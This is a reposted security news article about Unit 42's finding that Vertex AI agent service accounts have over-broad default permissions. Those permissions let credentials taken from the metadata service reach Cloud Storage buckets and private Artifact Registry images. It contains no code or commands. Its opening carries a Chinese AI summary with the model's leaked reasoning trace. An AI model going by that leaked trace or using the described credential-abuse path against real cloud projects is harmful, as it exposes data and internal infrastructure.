Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要仔细阅读文章,理解其主要信息。 文章讲的是Google Cloud的Vertex AI平台存在安全漏洞。Palo Alto Networks Unit 42的研究人员发现,Vertex AI的权限模型被滥用,导致AI代理可能被武器化,窃取敏感数据并破坏云环境。具体来说,Per-Project, Per-Product Service Agent(P4SA)默认权限过大,攻击者可以利用这些权限获取服务代理的凭证,进而访问Google Cloud Storage桶和其他内部资源。 此外,攻击者还能访问Google拥有的Artifact Registry仓库,下载核心容器镜像,这不仅泄露了Google的知识产权,还可能帮助攻击者寻找更多漏洞。Google已经更新了文档,并建议使用BYOSA来限制权限。 所以总结起来,文章主要描述了Vertex AI的一个严重安全漏洞及其潜在影响。我需要把这些关键点浓缩到100字以内,并且直接描述内容。 可能的结构是:Google Cloud Vertex AI平台存在安全漏洞,可能导致AI代理被武器化窃取数据并破坏云环境。研究人员指出,默认权限过大允许攻击者获取敏感凭证和访问内部资源。Google已采取措施修复问题。 这样应该符合用户的要求。 </think> Google Cloud的Vertex AI平台存在安全漏洞,可能导致AI代理被武器化以窃取敏感数据并破坏云环境。研究人员发现,默认权限过大允许攻击者获取服务代理凭证并访问内部资源。该问题已得到修复建议。 2026-3-31 13:9:0 Author: thehackernews.com(查看原文) 阅读量:1 收藏

Cloud Security / AI Security

Cybersecurity researchers have disclosed a security "blind spot" in Google Cloud's Vertex AI platform that could allow artificial intelligence (AI) agents to be weaponized by an attacker to gain unauthorized access to sensitive data and compromise an organization's cloud environment.

According to Palo Alto Networks Unit 42, the issue relates to how the Vertex AI permission model can be misused by taking advantage of the service agent's excessive permission scoping by default.

"A misconfigured or compromised agent can become a 'double agent' that appears to serve its intended purpose, while secretly exfiltrating sensitive data, compromising infrastructure, and creating backdoors into an organization's most critical systems," Unit 42 researcher Ofir Shaty said in a report shared with The Hacker News.

Specifically, the cybersecurity company found that the Per-Project, Per-Product Service Agent (P4SA) associated with a deployed AI agent built using Vertex AI's Agent Development Kit (ADK) had excessive permissions granted by default. This opened the door to a scenario where the P4SA's default permissions could be used to extract the credentials of a service agent and conduct actions on its behalf.

After deploying the Vertex agent via Agent Engine, any call to the agent invokes Google's metadata service and exposes the credentials of the service agent, along with the Google Cloud Platform (GCP) project that hosts the AI agent, the identity of the AI agent, and the scopes of the machine that hosts the AI agent.

Unit 42 said it was able to use the stolen credentials to jump from the AI agent's execution context into the customer project, effectively undermining isolation guarantees and permitting unrestricted read access to all Google Cloud Storage buckets' data within that project.

"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into a potential insider threat," it added.

That's not all. With the deployed Vertex AI Agent Engine running within a Google-managed tenant project, the extracted credentials also granted access to the Google Cloud Storage buckets within the tenant, offering more details about the platform's internal infrastructure. However, the credentials were found to lack the necessary permissions required to access the exposed buckets.

To make matters worse, the same P4SA service agent credentials also enabled access to restricted, Google-owned Artifact Registry repositories that were revealed during the deployment of the Agent Engine. An attacker could leverage this behavior to download container images from private repositories that constitute the core of the Vertex AI Reasoning Engine.

What's more, the compromised P4SA credentials not only made it possible to download images that were listed in logs during the Agent Engine deployment, but also exposed the contents of Artifact Registry repositories, including several other restricted images. 

"Gaining access to this proprietary code not only exposes Google's intellectual property, but also provides an attacker with a blueprint to find further vulnerabilities," Unit 42 explained. 

"The misconfigured Artifact Registry highlights a further flaw in access control management for critical infrastructure. An attacker could potentially leverage this unintended visibility to map Google's internal software supply chain, identify deprecated or vulnerable images, and plan further attacks."

Google has since updated its official documentation to clearly spell out how Vertex AI uses resources, accounts, and agents. The tech giant has also recommended that customers use Bring Your Own Service Account (BYOSA) to replace the default service agent and enforce the principle of least privilege (PoLP) to ensure that the agent has only the permissions it needs to perform the task at hand.

"Granting agents broad permissions by default violates the principle of least privilege and is a dangerous security flaw by design," Shaty said. "Organizations should treat AI agent deployment with the same rigor as new production code. Validate permission boundaries, restrict OAuth scopes to least privilege, review source integrity and conduct controlled security testing before production rollout."

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


文章来源: https://thehackernews.com/2026/03/vertex-ai-vulnerability-exposes-google.html
如有侵权请联系:admin#unsafe.sh